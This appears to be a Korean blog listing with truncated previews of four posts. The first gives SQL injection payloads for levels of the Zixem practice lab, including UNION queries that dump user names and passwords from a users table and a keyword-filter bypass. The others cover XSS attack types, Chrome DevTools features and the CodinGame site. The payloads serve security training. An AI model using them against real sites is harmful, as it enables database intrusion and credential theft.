Zixem SQLi lv2: -1' union select version(), database(), 3, 4--+ -1' union select id, user, pass, null from users where id=1--+ -1' union select id, user, pass, null from users where id=2--+ lv3: -1%27+order+by+9--+ -1%27+order+by+5--+ -1%27+order+by+4--+ -1'+unionon+select+database(),version(),(select+user+from+users+order+by+id+asc+limit+1),4--+ -1%27+unionon+all+select+id,user,pass,4+from+user..

크로스사이트 스크립팅(XSS, Cross-Site Scripting) 공격 종류 및 특징 1. Stored XSS (Persistent XSS, 저장 XSS) Stored XSS은 웹 어플리케이션 취약점이 있는 웹 서버에 악성 스크립트를 영속적으로 저장해 놓는 방법이다. 이로 인해 악성 스크립트가 웹 서버 데이터베이스로부터 비롯된다. (1) 공격자는 웹 사이트의 게시판, 사용자 프로필 및 코멘트 필드 등의 입력 form을 통해 POST로 악성 스크립트를 전달하면 서버는 해당 내용을 DB에 저장한다. (2) 희생자가 해당 페이지를 요청하면 (3) 서버는 저장된 악성 스크립트를 포함시킨 페이지를 사용자에게 전달하게 되고 (4) 희생자 브라우저에서 스크립트가 실행되어 XSS 공격이 수행된다. 2. Reflec..

출처: https://developers.google.com/web/tools/chrome-devtools/Ctrl + Shift + I 로 실행 기기 모드완전히 반응하는 모바일 우선 웹 경험을 만드세요.기기 모드반응형 및 기기별 뷰포트 테스트센서 에뮬레이션: Geolocation & AccelerometerElements 패널DOM과 CSS를 자유롭게 조작하여 사이트의 레이아웃과 디자인을 반복하십시오.페이지 검사 및 조정스타일 수정DOM 수정애니메이션 검사Console 패널개발 중 진단 정보를 남기고 페이지의 자바스크립트와 상호작용합니다.Console 사용하기커맨드 라인으로 상호작용하기Sources 패널브레이크 포인트를 사용해 자바스크립트를 디버깅하거나 Workspace를 로컬파일에 연결하여 DevTo..

https://www.codingame.com C/C++, Java, Javascript, Python 등 다양한 언어를 지원한다.프로그래밍 퍼즐을 풀며 코딩연습을 하고 테스트케이스에 대하여 시각화되어 움직이는 결과물을 볼 수 있다. (지원 안되는 문제들도 많았음) 문제를 풀면 업적을 쌓아서 레벨업을 할 수 있다. 자바로 7 문제를 풀어봤더니 Java Lover 업적을 얻었다. 실시간으로 게임을 코딩을 하면서 다른 유저들과 게임도 할 수 있다. 안해봤지만 대충 보니까 유닛을 움직이고 다른 유저를 공격하도록 코딩하는 듯